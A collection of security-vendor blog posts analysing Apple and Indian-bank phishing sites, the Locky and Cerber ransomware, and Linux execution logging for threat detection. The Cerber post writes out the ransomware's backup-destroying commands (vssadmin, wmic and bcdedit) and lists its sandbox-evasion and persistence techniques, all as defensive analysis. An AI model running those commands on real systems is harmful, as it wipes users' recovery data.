We found that the registrant names for all of these phony Apple domains were these Chinese names: “Yu Hu” and “Wu Yan”, “Yu Fei” and “Yu Zhe”. Moreover, all these domains were registered with qq[.].com email addresses. Details are available in Table 1 below.

Table 1: Domain registration information

Looking closer at our malicious domain detection system, we observed that the system had been seeing similar domains at an increasing frequency. Analyzing the registration information, we found some interesting patterns. Since January 2016 to the time of writing, the system marked around 240 unique domains that have something to do with Apple ID, iCloud or iTunes. From these 240 domains, we identified 154 unique email registrants with 64 unique emails pointing to qq[.]com, 36 unique Gmail email accounts, and 18 unique email addresses each belonging to 163[.]com and 126[.]com, and a couple more registered with 139[.]com.

This information is vital, as it could be used in following different ways:

  • The domain list provided here could be used by Apple customers as a blacklist; they can avoid browsing to such domains and providing credentials to any of the listed domains, whether they receive them via SMS, email or via any instant messaging service.
  • The Apple credential phishing detection teams could use this information, as it highlights that all domains registered with these email addresses, registrant names and addresses, as well as their combinations, are potentially malicious and serving phishing content. This information could be used to block all future domains registered by the same entities.
  • Patterns emerging from this data reveal that for such campaigns, attackers prefer to use email addresses from Chinese services such as qq.com, 126.com and 138.com. It has also been observed that instead of names, the attackers have used numbers (such as 545454@qq[.]com and 891495200@qq[.]com) in their email addresses.
Geo-location:

As seen in Figure 9, we observed all of these domains pointing to 13 unique IP addresses distributed across the U.S. and China, suggesting that these attacks were perhaps targeting users from these regions.

Figure 9: Geo-location plot of the IPs for this campaign

Campaign 2: British Apples Gone Bad

Our email attacks research team unearthed another targeted phishing campaign against Apple users in the UK. Table 2 is a list of 86 Apple phishing domains that we observed since January 2016.

 

Figure 9: Geo-location plot of the IPs for this campaign
Phishing Content and Analysis

All of these domains have been serving the same phishing content. A simple HTTP GET (via the wget utility) to the domain’s main page reveals HTML code containing a meta-refresh redirection to the signin.php page.

A wget session is shown here:

$ wget http://manageAppleid84913[.]net

--2016-04-05 16:47:44--  http://manageAppleid84913[.]net/

Resolving manageAppleid84913[.]net (manageAppleid84913[.]net)... 109.123.121.10

Connecting to manageAppleid84913[.]net (manageAppleid84913[.]net)|109.123.121.10|:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 203 [text/html]

Saving to: ‘index.html.1’

 

100%[============================================================================================================>] 203         --.-K/s   in 0s      

 

2016-04-05 16:47:44 (37.8 MB/s) - ‘index.html.1’ saved [203/203]

Content of the page is displayed here:

<meta http-equiv="refresh" content="0;URL=signin.php?c=ODcyNTA5MTJGUjU0OTYwNTQ5NDc3MTk3NTAxODE2ODYzNDgxODg2NzU3NA==&log=1&sFR=ODIxNjMzMzMxODA0NTE4MTMxNTQ5c2RmZ3M1ZjRzNjQyMDQzNjgzODcyOTU2MjU5&email=" />

 

This code redirects the browser to this URL/page:

http://manageAppleid84913[.]net/signin.php?c=OTYwNzUyNjlGUjU0OTYwNTQ5NDY0MDgxMjQ4OTQ5OTk0MTQ3MDc1NjYyOA==&log=1&sFR=ODc0MjQyNTEyNzMyODE1NTMxNTQ5c2RmZ3M1ZjRzNjQzMDU5MjUzMzg4NDMzNzE1&email=#

This loads a highly obfuscated JavaScript in the web browser that, on execution, generates the phishing HTML code at runtime to evade signature-based phishing detection systems. This is seen in Figure 17 in Appendix 2, with a deobfuscated version of the HTML code being shown in Figure 18.

This code renders in the browser to create the fake Apple ID phishing webpage seen in Figure 10, which resembles the authentic Apple page https://Appleid.Apple[.]com/.

Figure 10: Screenshot of the phishing page as seen by the victims in the browser

On submitting a fake username and password, the form gets submitted to signin-box-disabled.php and the JavaScript and jQuery creates the page seen in Figure 11, informing the user that the Apple ID provided has been locked and the user must unlock it:

Figure 11: Phishing page suggesting victims to unlock their Apple IDs

, which requests personal information such as name, date of birth, telephone numbers, addresses, credit card details and security questions, as shown in Figure 12. While filling out this form, we observed that the country part of the address drop-down menu only allowed address options from England, Scotland and Wales, suggesting that this attack is targeting these regions onlyClicking on unlock leads the user to the page profile.php .

Figure 12: User information requested by phishing page

On submitting false information on this form, the user would get a page asking to wait while the entered information is confirmed or verified. After a couple of seconds of processing, the page congratulates the user that their Apple ID was successfully unlocked (Figure 13). As seen in Figure 14, the user is then redirected to the authentic Apple page at https://Appleid.Apple[.]com/.

Figure 13: Account verification page displayed by the phishing site

Figure 14: After a successful attack, victims are redirected to the real apple login page

Domain Registration Information

It was observed that all of these domains used the whois privacy protection feature offered by many registrars. This feature enables the registrants to hide their personal and contact information which otherwise is available via the whois service. These domains were registered with the email “contact@privacyprotect[.]org

Geo-location

All these domains (Table 2) were pointing to IPs in the UK, suggesting that they were hosted in the UK.

Conclusion

Cybercriminals are targeting Apple users by launching phishing campaigns focused on stealing Apple IDs, as well as personal, financial and other information. We witnessed a high frequency of these targeted phishing attacks in the first quarter of 2016. A few phishing campaigns were particularly interesting because of their sophisticated evasion techniques (using code encoding and obfuscation), geographical targets, and because the same content was being served across multiple domains, which indicates the same phishing kits were being used.

One campaign we detected in March used sophisticated encoding/encryption techniques to evade phishing detection systems and provided a realistic looking Apple/iCloud interface. The majority of these domains were registered by individuals having email addresses pointing to Chinese services – registrant email, contact and address information points to China. Additionally, the domains were serving phony Apple webpages in Chinese, indicating that they were targeting Chinese users.

The second campaign we detected was launched against Apple users in the UK. This campaign used sophisticated evasion techniques (such as code obfuscation) to evade phishing detection systems and, whenever successful, was able to collect Apple IDs and personal and credit card information from its victims.

Organizations could use the information provided in this blog to protect their users from such sophisticated phishing campaigns by writing signatures for their phishing detection and prevention systems.

Credits and Acknowledgements

Special thanks to Yichong Lin, Jimmy Su, Mary Grace and Gaurav Dalal for their support.

Appendix 1

Figure 15: Obfuscated JavaScript served by the phishing site. In Green we have highlighted functions with: number system converters, pseudo-random pattern decoders, bit level binary operas

Figure 16: Obfuscated JS served by the phishing site. In Green we have highlighted functions with: number system converters, pseudo-random pattern decoders, bit level binary operaters. While in Red we have: XOR decoders.

Appendix 2

Figure 17: Obfuscated JavaScript content served by the site

Figure 18: Deobfuscated HTML content

For more information on phishing, please visit:

https://support.apple.com/HT203126
http://www.apple.com/legal/more-resources/phishing/
https://support.apple.com/HT204759

 

Locky is Back Asking for Unpaid Debts

24 June 2016 at 17:30

On June 21, 2016, FireEye’s Dynamic Threat Intelligence (DTI) identified an increase in JavaScript contained within spam emails. FireEye analysts determined the increase was the result of a new Locky ransomware spam campaign.

As shown in Figure 1, Locky spam activity was uninterrupted until June 1, 2016, when it stopped for nearly three weeks. During this period, Locky was the most dominant ransomware distributed in spam email. Now, Locky distribution has returned to the level seen during the first half of 2016.

Figure 1. Locky spam activity in 2016

Figure 2 shows that the majority of Locky spam email detections between June 21 and June 23 of this year were recorded in Japan, the United States and South Korea.

Figure 2. Locky spam by country from June 21 to June 23 of this year

The spam email – a sample shown is shown in Figure 3 – purports to contain an unpaid invoice in an attached ZIP archive. Instead of an invoice, the ZIP archive contains a Locky downloader written in JavaScript.

Figure 3. Locky spam email

JavaScript based Downloader Updates

In this campaign, few updates were seen in both the JavaScript based downloader and the Locky payload.

The JavaScript downloader does the following:

  1. Iterates over an array of URLs hosting the Locky payload.
  2. If a connection to one of the URLs fails, the JavaScript sleeps for 1,000 ms before continuing to iterate over the array of URLs.
  3. Uses a custom XOR-based decryption routine to decrypt the Locky payload.
  4. Ensures the decrypted binary is of a predefined size. In Figure 4 below, the size of the decrypted binary had to be greater than 143,360 bytes and smaller than 153,660 bytes to be executed.

Figure 4. Payload download function in JavaScript

5.     Checks (Figure 5) that the first two bytes of the binary contain the “MZ” header signature.

Figure 5: MZ header check

6.     Executes the decrypted payload by passing it the command line parameter, “123”.

Locky Payload Updates

The Locky ransomware downloaded in this campaign requires a command line argument to properly execute. This command line parameter, “123” in the analyzed sample, is passed to the binary by the first stage JavaScript-based downloader. This command line parameter value is used in the code unpacking stage of the ransomware. Legitimate binaries typically verify the number of arguments passed or compare the command line parameter with the expected value and gracefully exit if the check fails. However in the case of this Locky ransomware, the program does not exit (Figure 6) and the value received as a command line parameter is added to a constant value defined in the binary. The sum of the constant and the parameter value is used in the decryption routine (Figure 7). If no command line parameter is passed, it adds zero to the constant.

Figure 6. Command line parameter check

Figure 7. Decryption routine

If no command line parameter is passed, then the constant for the decryption routine is incorrect. This results in program crash as the decrypted code is invalid. In Figure 8 and Figure 9, we can see the decrypted code sections with and without the command line parameter, respectively.

Figure 8. Correct decrypted code

Figure 9. Incorrect decrypted code

By using this technique, Locky authors have created a dependency on the first stage downloader for the second stage to be executed properly. If a second stage payload such as this is directly analyzed, it will result in a crash.

Conclusion

As of today, the Locky spam campaign is still ongoing, with an added anti-analysis / sandbox evasion technique. We expect to see additional Locky spam campaigns and will remain vigilant in order to protect our customers.

Email Hashes

2cdf62f8aae20026418f143895c769a2009e6b9b3ac59bfa8fc79ca2f326b93a

1fd5c1f0ecc1d54324f3bdc327e7893032482a13c0914ef6f531bd93caef0a06

0ea7d59d7f1494fce8f45a1f35abb07a456de6d8d65327eca8ff84f307a49a06

22645be8553628574a7af3c32a45178e201e9af33b20b36d29b9c012b731da4c

198d8d1a89221c575d957c1f4342741f3675ebb10f95ffe3371150e124f4850e

 

Cerber: Analyzing a Ransomware Attack Methodology To Enable Protection

18 July 2016 at 12:00

Ransomware is a common method of cyber extortion for financial gain that typically involves users being unable to interact with their files, applications or systems until a ransom is paid. Accessibility of cryptocurrency such as Bitcoin has directly contributed to this ransomware model. Based on data from FireEye Dynamic Threat Intelligence (DTI), ransomware activities have been rising fairly steadily since mid-2015.

On June 10, 2016, FireEye’s HX detected a Cerber ransomware campaign involving the distribution of emails with a malicious Microsoft Word document attached. If a recipient were to open the document a malicious macro would contact an attacker-controlled website to download and install the Cerber family of ransomware.

Exploit Guard, a major new feature of FireEye Endpoint Security (HX), detected the threat and alerted HX customers on infections in the field so that organizations could inhibit the deployment of Cerber ransomware. After investigating further, the FireEye research team worked with security agency CERT-Netherlands, as well as web hosting providers who unknowingly hosted the Cerber installer, and were able to shut down that instance of the Cerber command and control (C2) within hours of detecting the activity. With the attacker-controlled servers offline, macros and other malicious payloads configured to download are incapable of infecting users with ransomware.

FireEye hasn’t seen any additional infections from this attacker since shutting down the C2 server, although the attacker could configure one or more additional C2 servers and resume the campaign at any time. This particular campaign was observed on six unique endpoints from three different FireEye endpoint security customers. HX has proven effective at detecting and inhibiting the success of Cerber malware.

Attack Process

The Cerber ransomware attack cycle we observed can be broadly broken down into eight steps:

  1. Target receives and opens a Word document.
  2. Macro in document is invoked to run PowerShell in hidden mode.
  3. Control is passed to PowerShell, which connects to a malicious site to download the ransomware.
  4. On successful connection, the ransomware is written to the disk of the victim.
  5. PowerShell executes the ransomware.
  6. The malware configures multiple concurrent persistence mechanisms by creating command processor, screensaver, startup.run and runonce registry entries.
  7. The executable uses native Windows utilities such as WMIC and/or VSSAdmin to delete backups and shadow copies.
  8. Files are encrypted and messages are presented to the user requesting payment.

Rather than waiting for the payload to be downloaded or started around stage four or five of the aforementioned attack cycle, Exploit Guard provides coverage for most steps of the attack cycle – beginning in this case at the second step.

The most common way to deliver ransomware is via Word documents with embedded macros or a Microsoft Office exploit. FireEye Exploit Guard detects both of these attacks at the initial stage of the attack cycle.

PowerShell Abuse

When the victim opens the attached Word document, the malicious macro writes a small piece of VBScript into memory and executes it. This VBScript executes PowerShell to connect to an attacker-controlled server and download the ransomware (profilest.exe), as seen in Figure 1.

Figure 1. Launch sequence of Cerber – the macro is responsible for invoking PowerShell and PowerShell downloads and runs the malware

It has been increasingly common for threat actors to use malicious macros to infect users because the majority of organizations permit macros to run from Internet-sourced office documents.

In this case we observed the macrocode calling PowerShell to bypass execution policies – and run in hidden as well as encrypted mode – with the intention that PowerShell would download the ransomware and execute it without the knowledge of the victim.

Further investigation of the link and executable showed that every few seconds the malware hash changed with a more current compilation timestamp and different appended data bytes – a technique often used to evade hash-based detection.

Cerber in Action

Initial payload behavior

Upon execution, the Cerber malware will check to see where it is being launched from. Unless it is being launched from a specific location (%APPDATA%\&#60GUID&#62), it creates a copy of itself in the victim's %APPDATA% folder under a filename chosen randomly and obtained from the %WINDIR%\system32 folder.

If the malware is launched from the specific aforementioned folder and after eliminating any blacklisted filenames from an internal list, then the malware creates a renamed copy of itself to “%APPDATA%\&#60GUID&#62” using a pseudo-randomly selected name from the “system32” directory. The malware executes the malware from the new location and then cleans up after itself.

Shadow deletion

As with many other ransomware families, Cerber will bypass UAC checks, delete any volume shadow copies and disable safe boot options. Cerber accomplished this by launching the following processes using respective arguments:

Vssadmin.exe "delete shadows /all /quiet"

WMIC.exe "shadowcopy delete"

Bcdedit.exe "/set {default} recoveryenabled no"

Bcdedit.exe "/set {default} bootstatuspolicy ignoreallfailures

Coercion

People may wonder why victims pay the ransom to the threat actors. In some cases it is as simple as needing to get files back, but in other instances a victim may feel coerced or even intimidated. We noticed these tactics being used in this campaign, where the victim is shown the message in Figure 2 upon being infected with Cerber.

Figure 2. A message to the victim after encryption

The ransomware authors attempt to incentivize the victim into paying quickly by providing a 50 percent discount if the ransom is paid within a certain timeframe, as seen in Figure 3.

 

 

Figure 3. Ransom offered to victim, which is discounted for five days

Multilingual Support

As seen in Figure 4, the Cerber ransomware presented its message and instructions in 12 different languages, indicating this attack was on a global scale.

Figure 4.   Interface provided to the victim to pay ransom supports 12 languages

Encryption

Cerber targets 294 different file extensions for encryption, including .doc (typically Microsoft Word documents), .ppt (generally Microsoft PowerPoint slideshows), .jpg and other images. It also targets financial file formats such as. ibank (used with certain personal finance management software) and .wallet (used for Bitcoin).

Selective Targeting

Selective targeting was used in this campaign. The attackers were observed checking the country code of a host machine’s public IP address against a list of blacklisted countries in the JSON configuration, utilizing online services such as ipinfo.io to verify the information. Blacklisted (protected) countries include: Armenia, Azerbaijan, Belarus, Georgia, Kyrgyzstan, Kazakhstan, Moldova, Russia, Turkmenistan, Tajikistan, Ukraine, and Uzbekistan.

The attack also checked a system's keyboard layout to further ensure it avoided infecting machines in the attackers geography: 1049—Russian, ¨ 1058—Ukrainian, 1059—Belarusian, 1064—Tajik, 1067—Armenian, 1068—Azeri, (Latin), 1079—Georgian, 1087—Kazakh, 1088—Kyrgyz (Cyrillic), 1090—Turkmen, 1091—Uzbek (Latin), 2072—Romanian (Moldova), 2073—Russian (Moldova), 2092—Azeri (Cyrillic), 2115—Uzbek (Cyrillic).

Selective targeting has historically been used to keep malware from infecting endpoints within the author’s geographical region, thus protecting them from the wrath of local authorities. The actor also controls their exposure using this technique. In this case, there is reason to suspect the attackers are based in Russia or the surrounding region.

Anti VM Checks

The malware searches for a series of hooked modules, specific filenames and paths, and known sandbox volume serial numbers, including: sbiedll.dll, dir_watch.dll, api_log.dll, dbghelp.dll, Frz_State, C:\popupkiller.exe, C:\stimulator.exe, C:\TOOLS\execute.exe, \sand-box\, \cwsandbox\, \sandbox\, 0CD1A40, 6CBBC508, 774E1682, 837F873E, 8B6F64BC.

Aside from the aforementioned checks and blacklisting, there is also a wait option built in where the payload will delay execution on an infected machine before it launches an encryption routine. This technique was likely implemented to further avoid detection within sandbox environments.

Persistence

Once executed, Cerber deploys the following persistence techniques to make sure a system remains infected:

  • A registry key is added to launch the malware instead of the screensaver when the system becomes idle.
  • The “CommandProcessor” Autorun keyvalue is changed to point to the Cerber payload so that the malware will be launched each time the Windows terminal, “cmd.exe”, is launched.
  • A shortcut (.lnk) file is added to the startup folder. This file references the ransomware and Windows will execute the file immediately after the infected user logs in.
  • Common persistence methods such as run and runonce key are also used.
A Solid Defense

Mitigating ransomware malware has become a high priority for affected organizations because passive security technologies such as signature-based containment have proven ineffective.

Malware authors have demonstrated an ability to outpace most endpoint controls by compiling multiple variations of their malware with minor binary differences. By using alternative packers and compilers, authors are increasing the level of effort for researchers and reverse-engineers. Unfortunately, those efforts don’t scale.

Disabling support for macros in documents from the Internet and increasing user awareness are two ways to reduce the likelihood of infection. If you can, consider blocking connections to websites you haven’t explicitly whitelisted. However, these controls may not be sufficient to prevent all infections or they may not be possible based on your organization.

FireEye Endpoint Security with Exploit Guard helps to detect exploits and techniques used by ransomware attacks (and other threat activity) during execution and provides analysts with greater visibility. This helps your security team conduct more detailed investigations of broader categories of threats. This information enables your organization to quickly stop threats and adapt defenses as needed.

Conclusion

Ransomware has become an increasingly common and effective attack affecting enterprises, impacting productivity and preventing users from accessing files and data.

Mitigating the threat of ransomware requires strong endpoint controls, and may include technologies that allow security personnel to quickly analyze multiple systems and correlate events to identify and respond to threats.

HX with Exploit Guard uses behavioral intelligence to accelerate this process, quickly analyzing endpoints within your enterprise and alerting your team so they can conduct an investigation and scope the compromise in real-time.

Traditional defenses don’t have the granular view required to do this, nor can they connect the dots of discreet individual processes that may be steps in an attack. This takes behavioral intelligence that is able to quickly analyze a wide array of processes and alert on them so analysts and security teams can conduct a complete investigation into what has, or is, transpiring. This can only be done if those professionals have the right tools and the visibility into all endpoint activity to effectively find every aspect of a threat and deal with it, all in real-time. Also, at FireEye, we go one step ahead and contact relevant authorities to bring down these types of campaigns.

Click here for more information about Exploit Guard technology.

Rotten Apples: Resurgence

20 October 2016 at 12:00

In June 2016, we published a blog about a phishing campaign targeting the Apple IDs and passwords of Chinese Apple users that emerged in the first quarter of 2016 (referred to as the “Zycode” phishing campaign). At FireEye Labs we have an automated system designed to proactively detect newly registered malicious domains and this system had observed some phishing domains that were designed to appear as legitimate Apple domains. Most of the domains reported by this system were suspended in June 2016, which resulted in a loss of momentum for the Zycode phishing campaign. Throughout the second quarter of 2016, the Zycode phishing campaign was in hibernation.

We recently observed a resurgence of the same phishing campaign when our systems detected roughly 90 phony Apple-like domains that were registered from July 2016 to September 2016. Once again, Chinese Apple users are being targeted for their Apple IDs and passwords using the same content reported on in our earlier blog. The majority of these domains are registered in the .com TLD by email accounts from qq[.]com, and the IPs of these domains point to mainland China, as seen in Figure 1.

Figure 1: Google map showing the location of the hosted phishing domains

What has not Changed?

The attackers have not changed the content of the phishing sites. The obfuscated JavaScript used in the earlier version is once again being used here in this campaign. We have provided the details of JavaScript and screenshots of interaction with the website in our earlier blog.

What has Changed?

Apparently the domains and email addresses used in previous version of the campaign were effectively taken down. Now the attackers have moved to a new malicious infrastructure; new domains, IPs and email addresses are being used for this campaign. The new domain names for the campaign are listed in Table 1, while their IPs and registrant emails are reported in Table 2 and Table 3, respectively.

Domains List

Table 1: Apple phishing domains serving the Zycode phishing kit.

Unique IP(s)

Table 2 shows the list of unique IPs, which are not the same as what was seen before.

Table 2. IP addresses used by the domains.

Unique Email Addresses

The email addresses used to register these domains, showing no similarity with email addresses in the previous campaign, are shown in Table 3.

Table 3. List of unique registrant emails.

Unique Registrants

Table 4 shows the registrant names, which have no similarity with the previous registrant name information.

Table 4. List of registrant names used by the phishing domains.

How to Avoid Being a Victim

Apple provides information on phishing here and here, and on iCloud security here. There are simple ways for a user to be more secure against this and similar attacks. The following are a few tips:

  • Enable two-factor authentication for Apple ID.
  • Always check the address bar for the correct web address.
  • Avoid clicking links in emails and SMS messages that supposedly direct to iCloud pages.
  • Use our FireEye EX appliance, which provides effective detection for the Zycode phishing campaign.

Extending Linux Executable Logging With The Integrity Measurement Architecture

9 November 2016 at 13:00

Gaining insight into the files being executed on your system is a great first step towards improved visibility on your endpoints. Taking this a step further, centrally storing logs of file execution data so they can be used for detection and hunting provides an excellent opportunity to find evil on your network.

A SIEM, and to some degree your entire security monitoring program, is only as good as the data you are collecting. Process execution data is incredibly valuable for enabling a multitude of detection and hunting scenarios, which means it’s something you should consider collecting and storing. Customers of our Threat Analytics Platform (TAP) cloud-based SIEM solution frequently ask us about tools that can help them collect this type of file execution data. For Windows systems, our detection team typically recommends the Sysinternals Sysmon tool since it provides excellent visibility into the type of files that are being executed on your Windows machines and both integrates and scales well when properly deployed.

In this post, I’m going to talk about a lesser-known feature of the Linux architecture called the Integrity Measurement Architecture (IMA). When coupled with auditd, IMA will allow you to achieve on Linux hosts a similar executable logging capability as the Sysmon tool for Windows.

The Integrity Measurement Architecture is a component of the Linux kernel’s integrity subsystem. For this post, we’re going to focus on a minimum baseline configuration and policy in order to get file execution logs into a format that can be ingested by your SIEM. File execution logs are available in various forms and locations in Linux, but the logs we will be generating contain a wealth of data in one location that would otherwise need to be gathered from several disparate sources or may have not have been available at all.

First, you should familiarize yourself with documentation for your Linux distribution to verify whether the IMA kernel compilation options are enabled by default. The IMA subsystem has been part of the mainline kernel since version 2.6.30, but not every distribution compiles their kernel with these options enabled. All of the examples in this post were tested on Ubuntu 16.04.1 LTS, as the IMA kernel options are enabled by default in this distribution.

Instructions for compiling a kernel with these options enabled are listed in this Integrity Measurement Architecture documentation. Documentation for auditd can be found here. The reason we need the auditd daemon is because it is the userspace component for Linux’s auditing platform and it is responsible for writing all the resulting audit records to disk. Without auditd, the logs for the events we will be generating would never get written out to disk.

The stated goals of the IMA subsystem are “to detect if files have been accidentally or maliciously altered, both remotely and locally, appraise a file’s measurement against a ‘good’ value stored as an extended attribute, and enforce local file integrity.” To achieve these goals, IMA provides several functions, including:

  • Collect – “measure” a file before it is accessed. The term measurement in this context means to grab a hash of the file data, the hash of some file metadata and the file path, and then store this data in a runtime measurement list.
  • Store – add the measurement to a kernel resident list and, if a hardware Trusted Platform Module (TPM) is present, extend the IMA Platform Configuration Register (PCR). TPM and PCR are part of an international standard for dedicated microcontrollers intended to secure hardware.
  • Attest – if present, use the TPM to sign the IMA PCR value to allow a remote validation of the measurement list.
  • Appraise – enforce local validation of a measurement against a “good” value stored in an extended attribute of the file.
  • Protect – protect a file’s security extended attributes (including appraisal hash) against off-line attack.
Collect & Store

Part of the way the appraisal function validates a file is to calculate a hash value, which just determines how mathematically unique the file is, and compare this value against a stored “good” hash value. The specific hash function that IMA uses is a configurable option.

Attest

This is effective for locally ensuring integrity of an environment, but what if we also wanted to compare these measured hash values against a list of known bad file hashes through an external or internal blacklist? It could also be the case that runtime integrity checking on every machine isn’t suitable for your environment. Generating and storing these logs opens up the possibility for future investigation as well as centralized detection capabilities if your organization is ingesting these logs into a single repository.

Appraise

We can utilize the auditing function of IMA to generate a log every time IMA measures an executable. When an IMA policy is set to audit any executable and auditd is running, a log will be written containing metadata for each executable.

The simplest IMA policy we can write to log all executables looks like this:

audit func=BPRM_CHECK mask=MAY_EXEC

There are several ways to apply this policy to IMA that are detailed in the IMA documentation. Later versions of systemd will apply a custom policy located in “/etc/ima/ima-policy”. Placing the single line policy set forth above in this file will cause systemd to apply this IMA policy to the system. This version of systemd was included in Ubuntu 16.04.1.

It should be noted that the example policy is extremely broad and will result in a high volume of logs being generated, primarily by daemons – equivalent to a Windows service - performing routine tasks, such as systemd. The policy can be further restricted by file magic values, UID, filesystem mask values and several others, as specified by the policy documentation.

This policy will produce audit INTEGRITY_RULE logs that look like this:

This gives us several great pieces of information for searching and correlation in a SIEM: the path of the file that was executed (kaiten.bin) and the path of its parent (/bin/bash), the PID(8205) and parent PID(1943) of the executable, the SHA-1 hash value(48a3171d8f04c09f6d06362d4c4b995eaa97d489) of this file (or whatever hash value you configured IMA to use), and the UID, GID, etc., of the user that owned the process. A quick check in VirusTotal of the hash supplied to us by IMA in this example shows that this is a variant of the Kaiten IoT bot.

Once you are generating logs with IMA and auditd, you can send them to your SIEM using your normal log ingestion process via something like syslog.

Now that you’re ingesting these logs into your SIEM, there are all sorts of detection and hunting scenarios available:

  • Using rules and ingestion decoration services (services that add additional metadata to a log at ingestion time) to check hashes against internal and or external blacklists. For example:

            o   VirusTotal
            o   Lists of hashes seen in public Linux honeypots
            o   Lists of samples seen in previous incidents

  • Inspecting the path of the executable for abnormalities. For example:

            o   Binaries named as system utilities executing from unusual locations (/opt/app/sudo, /home/foo/su)
            o   Paths you wouldn’t expect to see with executable files (Executables in your web app’s image upload directory
            o   Binaries executing from hidden directories (/opt/.hidden/foo, /home/user/.hidden/bar)

  • Checking specific UIDs and GIDs for unusual execution. For example:

            o   Web app user account attempting to use unusual utilities (top, netstat, su, etc.)
            o   An account under an archive service group attempting to execute something out of /tmp

  • Checking specific parent executables and processes for unusual execution. For example:

            o   Communication broker executing directory traversal commands
            o   Apache process executing netcat

Configuration options for both IMA and auditd are extensive so, if this post is of interest to your organization, I highly recommend reading the documentation for both IMA and auditd so they can be further customized to your needs. This post isn’t meant to be an all-inclusive guide to IMA, but our hope is that it introduces you to this capability so that you can dive in and make it useful for improving your visibility into Linux process execution and aid you in finding more evil in your network.

‘One-Stop Shop’ – Phishing Domain Targets Information from Customers of Several Indian Banks

30 November 2016 at 17:13

FireEye Labs recently discovered a malicious phishing domain designed to steal a variety of information – including credentials and mobile numbers – from customers of several banks in India. Currently, we have not observed this domain being used in any campaigns. The phishing websites appear to be in the earlier stages of development and through this post we hope users will be able to identify these types of emerging threats in the future.

FireEye phishing detection technology identified a newly registered domain, “csecurepay[.]com”, that was registered on Oct. 23, 2016. The website purports to offer online payment gateway services, but is actually a phishing website that leads to the capturing of victim logon credentials – and other information – for multiple banks operating in India.

Prior to publication, FireEye notified the Indian Computer Emergency Response Team.

Phishing Template Presentation and Techniques

Step 1

URL: hxxp://csecurepay[.]com/load-cash-step2.aspx

When navigating to the URL, the domain appears to be a payment gateway and requests that the user enter their bank account number and the amount to be transferred, as seen in Figure 1. The victim is allowed to choose their bank from a list that is provided.

Figure 1: Bank information being requested

By looking at the list, it is clear that only Indian banks are being targeted at this time. A total of 26 banks are available and these are named in the Appendix.

Step 2

URL:  hxxp://csecurepay[.]com/PaymentConfirmation.aspx

The next website requests the victim to enter their valid 10-digit mobile number and email ID (Figure 2), which makes the website appear more legitimate.

Figure 2: Personal information being requested

Step 3

The victim will then be redirected to the spoofed online banking page of the bank they selected, which requests that they log in using their user name and password. Figure 3 shows a fake login page for State Bank of India. See the Appendix for more banks that have spoofed login pages.

Figure 3: Fake login page for State Bank of India

After entering their login credentials, the victim will be asked to key in their One Time Password (OTP), as seen in Figure 4.

Figure 4: OTP being requested

Step 4

URL: hxxp://csecurepay[.]com/Final.aspx

Once all of the sensitive data is gathered, a fake failed login message will be displayed to the victim, as seen in Figure 5.

Figure 5: Fake error message being displayed

Credit and Debit Card Phishing Website

Using the registrant information from the csecurepay domain, we found another domain registered by the phisher as “nsecurepay[.]com”. The domain, registered in latest August 2016, aims to steal credit and debit card information.

The following are among the list of cards that are targeted:

1.     ICICI Credit Card

2.     ICICI Debit Card

3.     Visa/Master Credit Card

4.     Visa/Master Debit Card

5.     SBI Debit Card Only

At the time of this writing, the nsecurepay website was producing errors when redirecting to spoofed credit and debit card pages. Figure 6 shows the front end.

Figure 6: Nsecurepay front end

Conclusion

Phishing has its own development lifecycle. It usually starts off with building the tools and developing the “hooks” for luring victims into providing their financial information. Once the phishing website (or websites) is fully operational, we typically begin to see a wave of phishing emails pointing to it.

In this case, we see that phishing websites have been crafted to spoof multiple banks in India. These attackers can potentially grab sensitive online banking information and other personal data, and even provided support for multifactor authentication and OTP. Moreover, disguising the initial presentation to appear as an online payment gateway service makes the phishing attack seem more legitimate.

FireEye Labs detects this phishing attack and customers will be protected against the usage of these sites in possible future campaigns.

Appendix

Fake login pages were served for 26 banks. The following is a list of some of the banks:

-Bank of Baroda - Corporate

-Bank of Baroda - Retail

-Bank of Maharashtra

-HDFC Bank

Figure 7: HDFC Bank fake login page

-ICICI Bank

-IDBI Bank

-Indian Bank

-IndusInd Bank

-Jammu and Kashmir Bank

-Kotak Bank

-Lakshmi Vilas Bank - Corporate

-Lakshmi Vilas Bank - Retail

-State Bank of Hyderabad

-State Bank of India

-State Bank of Jaipur

-State Bank of Mysore

-State Bank of Patiala

-State Bank of Bikaner

-State Bank of Travancore

-Tamilnad Mercantile Bank

-United Bank of India

FLARE Script Series: Querying Dynamic State using the FireEye Labs Query-Oriented Debugger (flare-qdb)

4 January 2017 at 14:02

Introduction

This post continues the FireEye Labs Advanced Reverse Engineering (FLARE) script series. Here, we introduce flare-qdb, a command-line utility and Python module based on vivisect for querying and altering dynamic binary state conveniently, iteratively, and at scale. flare-qdb works on Windows and Linux, and can be obtained from the flare-qdb github project.

Motivation

Efficiently understanding complex or obfuscated malware frequently entails debugging. Often, the linear process of following the program counter raises questions about parallel or previous register states, state changes within a loop, or if an instruction will ever be executed at all. For example, a register’s value may not become interesting until the analyst learns it was an important input to a function that has already been executed. Restarting a debug session and cataloging the results can take the analyst out of the original thought process from which the question arose.

A malware analyst must constantly judge whether such inquiries will lend indispensable observations or extraneous distractions. The wrong decision wastes precious time. It would be useful to query malware state like a database, similar to the following:

SELECT eax, poi(ebp-0x14) FROM malware.exe WHERE eip = 0x401072

FLARE has devised a command-line tool to efficiently query dynamic state and more in a similar fashion. The following is a description of this tool with examples of how it has been used within FLARE to analyze malware, simulate new scenarios, and even solve challenges from the 2016 FLARE-On challenge.

Usage

Drawing heavily from vivisect, flare-qdb is an open source tool for efficiently posing sophisticated questions and obtaining simple answers from binaries. flare-qdb’s command-line syntax is as follows:

flareqdb "<cmdline>" -at <address> "<python>"

flare-qdb allows an analyst to execute a command line of their choosing, break on arbitrary program counter values, optionally check conditions, and display or alter program state with ad-hoc Python code. flare-qdb implements several WinDbg-like builtins for querying and modifying state. Table 1 lists a few illustrative example queries.

Experiment or Alteration

Query

What two DWORD arguments are passed to kernel32!Beep? (WinDbg analog: dd)

-at kernel32.Beep "dd('esp+4', 2)"

Terminate if eax is null at 0x401072 (WinDbg analog: .kill)

-at-if 0x401072 eax==0 "kill()"

Alter ecx programmatically (WinDbg analog: r)

-at malwaremodule+0x102a "r('ecx', '(ebp-0x14)*eax')

Alter memory programmatically

-at 0x401003 "memset('ebp-0x14', 0x2a, 4)"

Table 1: Example flare-qdb queries

Using the flareqdb Command Line

The usefulness of flare-qdb can be seen in cases such as loops dealing with strings. Figure 1 shows the flareqdb command line utility being used to dump the Unicode string pointed to by a stack variable for each iteration of a loop. The output reveals that the variable is used as a runner pointer iterating through argv[1].

